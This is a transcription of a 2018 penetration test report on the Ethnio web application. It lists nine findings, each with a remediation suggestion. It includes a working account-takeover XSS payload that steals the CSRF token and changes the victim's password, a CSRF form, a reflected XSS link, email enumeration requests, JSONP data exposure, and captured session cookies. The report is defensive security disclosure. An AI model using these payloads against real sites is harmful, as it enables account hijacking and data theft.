Penetration Test Report

Transcription

1 Penetration Test Report Feb 12, 2018 Ethnio, Inc W SUNSET BLVD LOS angeles, CA Tel (888) ETHN.io

2 Summary This document contains the most recent pen test results from our third party provider, Include Security, as well as key findings from automated tools like Metasploit. The security of the Ethnio web application benefits from the use of the Ruby on Rails web application framework. No critical severity issues were discovered in the application, however several issues were discovered that represent significant risk. Ethnio is taking steps to remediate the specific issues discussed in this report, as well as keeping security in mind when writing future code, and implementing increasingly strict firewalls for the application servers. The Include Security assessment team has provided specific remediation suggestions that Ethnio can follow in each of the findings below. 9 Issues Found Each finding is assigned a unique number, sequential in the category, so H1, H2, H3, would all be high risk findings in order. Similarly, each medium risk finding is numbered M1, M2, etc. H = High Risk M = Medium Risk L = Low Risk I = Informational Only 1 Issue 2 Issues 6 Issues 0 Issues Disclaimer The information presented in this document is provided as is and without warranty. Pen tests are a point in time analysis and as such it is possible that something in the environment could have changed since the tests reflected in this report were run. Also, it is possible that new vulnerabilities may have been discovered since the tests were run. For this reason, this report should be considered a guide, not a 100% representation of the risk threatening your systems, networks and applications. Ethnio, Inc Page 2 of 11

3 H1 Persistent Cross-Site Scripting The Ethnio web application is vulnerable to persistent cross site scripting (XSS) due to weak restrictions on uploaded logo file types. This vulnerability can be used to change a victim's Ethnio password, and effectively steal their account. When creating a screener, a user may upload a logo image file. The image is uploaded in an HTTPS POST request to a URL similar to ethn.io/rest/screeners/9098/upload_logo. The Ethnio application does not restrict the types of files which can be uploaded. An attacker may therefore upload an HTML file containing malicious JavaScript. If the attacker can then cause a victim to browse to the HTML document kept on the server after the upload, the JavaScript code will run in the victim's browser in the context of the victim's Ethnio session. To demonstrate this vulnerability, the following proof-of-concept HTML document was created and uploaded by the free user tester8 using the image upload form at edit?step=setup:! <html> <head> <script> function a() { fdoc = document.getelementbyid("f").contentdocument; url = fdoc.location.protocol + "//" + fdoc.location.host + fdoc.body.innerhtml.match(/\/users\/[0-9]+\/edit/) document.getelementbyid("g").onload = function() {b();}; document.getelementbyid("g").src = url; } function b() { var gdoc = document.getelementbyid("g").contentdocument; var newpw = "newpassword9"; var authtoken = escape(gdoc.getelementsbyname("authenticity_token")[0].value); var body = "_method=put&authenticity_token=" + authtoken + "&user%5bpassword%5d=" + newpw + "&user%5bpassword_confirmation%5d=" + newpw + "&commit=save"; var r = new XMLHttpRequest(); r.open("post", url.replace("/edit",""), false); r.setrequestheader("content-type","application/x-www-form-urlencoded"); r.send(body); } </script> </head> <body> Test! <iframe id="f" src="../../rest/screeners" onload=a()></iframe> <iframe id="g"></iframe> </body> </html> Ethnio, Inc Page 3 of 11

4 This document uses JavaScript to identify the user logged in to Ethnio, steal their authenticity_token token, and use this information to perform a password change POST request. The exploit was triggered by a victim visiting the following URL, which refers to the uploaded HTML file, while logged in as a user: The malicious JavaScript code was executed, causing the following POST request to be made, changing a user's password:! POST /users/3932 HTTP/1.1 Host: beta.ethn.io Proxy-Connection: keep-alive Content-Length: 166 Origin: User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/ (KHTML, like Gecko) Chrome/ Safari/ Content-type: application/x-www-form-urlencoded Accept: */* Referer: Accept-Encoding: gzip,deflate,sdch Accept-Language: en-us,en;q=0.8 Accept-Charset: ISO ,utf-8;q=0.7,*;q=0.3 Cookie: ethnio_displayed=yes; utma= ; utmb= ; utmc= ; utmz= utmcsr=beta.ethn.io utmccn=(referral) utmcmd=referral ut mcct=/rest/dash; auth_token=e6e8318d73c8dfd b848f3b141b; _ethnio_session_id=bah7ctoqx2nzcmzfdg9rzw4imvdidufsslpbcuzwmedbdezauk9qslj2smfbewjkvytq VGVWNXpaVDg0TzA9Og9zZXNzaW9uX2lkIiU4NGViMGI1MWYyYTdhYzkwYmU0MTI2NzExM2M4MzAyMiIKZmxhc2h JQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoMdXNlcl9pZGkCXA8%3D f1be3af50fbffab5db0ca777892f8b1fd637 _method=put&authenticity_token=whuarjzaqfp0gatfzrojjrvjaaybdw+ptev5zzt84o0%3d&user%5bpa ssword%5d=newpassword9&user%5bpassword_confirmation%5d=newpassword9&commit=save! This finding is considered high risk because an attacker may use a free account on the Ethnio application to discover and exploit the vulnerability, which could result in the compromise of a victim's Ethnio account. To prevent this type of attack, the Ethnio application should strictly enforce the types of files that are uploaded as logos. Logo files should only be accepted if they match a list of image file types; if an uploaded logo file is not an image, it should not remain accessible from the server. Ethnio, Inc Page 4 of 11

5 M1 Anti-CSRF Token not being Verified During testing it was identified that the application did not verify the submitted anti-csrf token. If a user visits an attacker-controlled page on an external domain while logged in, then an attacker can issue a cross-site requests to take action the user s behalf. Such a request may either contain an additional XSS payload or simply change information such as the user's password. For example, by making a request to /rest/screeners, an attacker can add a new screener. HTML of a page demonstrating the issue: <form action= method=post id=attackform> <input name=screener[name] value="test csrf"> <input type=submit> </form> Result (a new screener by the name test csrf is added): Anti-CSRF tokens are generated and "used" throughout the application, but are not verified upon submission of form data. It is strongly recommended that the application is reconfigured to require valid anti-csrf tokens. Ethnio, Inc Page 5 of 11

6 M2 Password not Required for Password Change Request The password change workflow in the Ethnio web application does not request a user's old password in order to change the password. This means that an attacker could use a cross-site scripting vulnerability in the web application to change a victim's password. An example of this type of attack is demonstrated in finding H1. The password change logic does not require an anti cross-site request forgery token, so the password can be changed with a cross-site request forgery attack as demonstrated in finding M2. The application should request the old password at the same time as it requests the new password. This adds an additional layer of defense in the case that anti-csrf protection is non-functional (as is currently the case) or is bypassed in some manner. Ethnio, Inc Page 6 of 11

7 L1 Reflected Cross-Site Scripting The Ethnio application contains a reflected XSS vulnerability in the form that is used to set the text of screeners' title pages located at /screeners/set_screener_title_description/[screener ID number]. JavaScript code that is included in an HTML <a> tag as part of the value URL parameter will be returned in the response. Other HTML tags such as <script> tags are filtered from the response. This vulnerability is considered low risk because the attacker must know a valid screener ID for the victim and the victim must click a link to trigger the attack. To demonstrate this attack, the following URL was visited while logged in as a user: This resulted in the following HTTP response, containing the javascript: link: value=<a+href="javascript:alert(1)">click</a> HTTP/ OK Content-Type: text/html; charset=utf-8 Connection: keep-alive Status: 200 X-Powered-By: Phusion Passenger (mod_rails/mod_rack) Set-Cookie: _ethnio_session_id=bah7ctoqx2nzcmzfdg9rzw4imstuzwhrb3fcv213tu5kmmiwnkfzntu2evfhwxbpmu 5V evjieujjc1jtyke9og9zzxnzaw9ux2lkiivjnwi0mmywzdkxowfmzmm0ndgzzte5zda3yznjztewyyikzmxhc 2h JQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsGOgtub3RpY2UiHExvZ2dlZCBpbiBzdWNj ZX NzZnVsbHkuBjoKQHVzZWR7BjsIVDoMdXNlcl9pZGkCXA8%3D-- f574a857715f92458de0fe14b9a11fd3c5a443ba; domain=.ethn.io; path=/; HttpOnly ETag: "e965c0c05c28f2c49bccc79992af538a" X-Runtime: 57 Cache-Control: private, max-age=0, must-revalidate Server: nginx/ Phusion Passenger (mod_rails/mod_rack) Content-Length: 39 <a href= javascript:alert(1)">click</a> Figure 1 shows that when the link is clicked, the JavaScript alert box is shown. The application does filtering of the input to prevent <script> and other HTML tags from being included in the response. Stricter checking should be done to ensure this type of attack is not possible. Ethnio, Inc Page 7 of 11

8 Figure 1: Result of XSS attack In order to better mitigate XSS attacks, the application should validate and properly HTML-escape all data before it is placed in a page to be returned to the user. A temporary mitigation can be accomplished with a network intermediary device such as Web Application Firewall. Alternatively input validation can be done to ensure the screener ID is only within the numeric range the application expects. Ethnio, Inc Page 8 of 11

9 L2 Username and Enumeration It is possible to enumerate the existence of usernames and addresses from the application by trying them against the register user functionality. An attacker may be able to use retrieved usernames and addresses to aid in a brute-force attack against other services, or in a social engineering attack. Valid applications credentials are not a prerequisite to abuse this functionality. The response is true - the address is not registered: GET /users/check_input? =this_ _is_not_used@includesecurity.com Host: ethn.io 200 OK Content-Length: 4 true The response is false - the address is already in use: GET /users/check_input? =this_ _is_not_used@includesecurity.com Host: ethn.io 200 OK Content-Length: 5 false If this particular privacy attribute of Ethnio users is of importance to the user-base then this feature should be removed as it allows an attacker to know if a particular address has an account on the application. Ethnio, Inc Page 9 of 11

10 L3 Unprotected JSONP The application exposes sensitive data in JSON/JSONP responses. Generally HTTP responses across the "Same Origin Policy" are not readable, but there are several exceptions to the rule. The most predominant examples are cross-domain loading of resources such as JavaScript and Cascading Style Sheets through the <script src=> and <style src=> tags. Responses to such resource requests are evaluated within the context/dom of the page issuing the requests, which in this instance enables a malicious page to read the contents of the exposed JSON. This may either leak sensitive information directly or lack data that is required for other attacks to be successful (CSRF or some instances of reflected XSS vulnerabilities) Response to a GET request to (the.js extension is added to tell the application we are expecting JSONP output): jquery("#name-9138").replacewith("\u003cform action=\"/rename/rename_screener/9138\" class=\"edit_screener\" id=\"edit_screener_9138\" method=\"post\" onsubmit=\"jquery.ajax({data:jquery.param(jquery(this).serializearray()) + '\u0026amp;authenticity_token=' + encodeuricomponent('b2k5ozd3y3ottulefiyvf/ druvl2jcjq6ijp1gobx38='), datatype:'script', type:'post', url:'/rename/ rename_screener/9138'}); return false;\"\u003e\u003cdiv style=\"margin:0;padding: 0;display:inline\"\u003E\u003Cinput name=\"_method\" type=\"hidden\" value=\"put\" / \u003e\u003cinput name=\"authenticity_token\" type=\"hidden\" value=\"b2k5ozd3y3ottulefiyvf/druvl2jcjq6ijp1gobx38=\" /\u003e\u003c/div\u003e\n \u003cinput id=\"edit_screener_name\" name=\"screener[name]\" size=\"30\" type=\"text\" value=\"test csrf\" /\u003e\n \u003cinput id=\"screener_submit\" name=\"commit\" type=\"submit\" value=\"update\" /\u003e\n\u003c/form\u003e"); By creating a malicious page and initializing the relevant functions ("jquery", "$", etc) the contents can read by including the exposed JSONP resource: <script src= This attack is commonly mitigated by requiring the web application to use a JSON parsing library and prefixing the returned data with a piece of code that will render a malicious <script> tag unable to load the data. A common way of implementing such a defense (used by Facebook, amongst others) is to prefix the data with a never-ending for loop: for(;;){} Ethnio, Inc Page 10 of 11

11 L4 Rubyzip outdated Ethnio currently uses rubyzip version It should be updated to or later Update L5 Loofah gem outdated Loofah gem is currently and should be updated to or later Update L6 Sprockets gem outdated The Sprockets gem is currently and should be or later Update Ethnio, Inc Page 11 of 11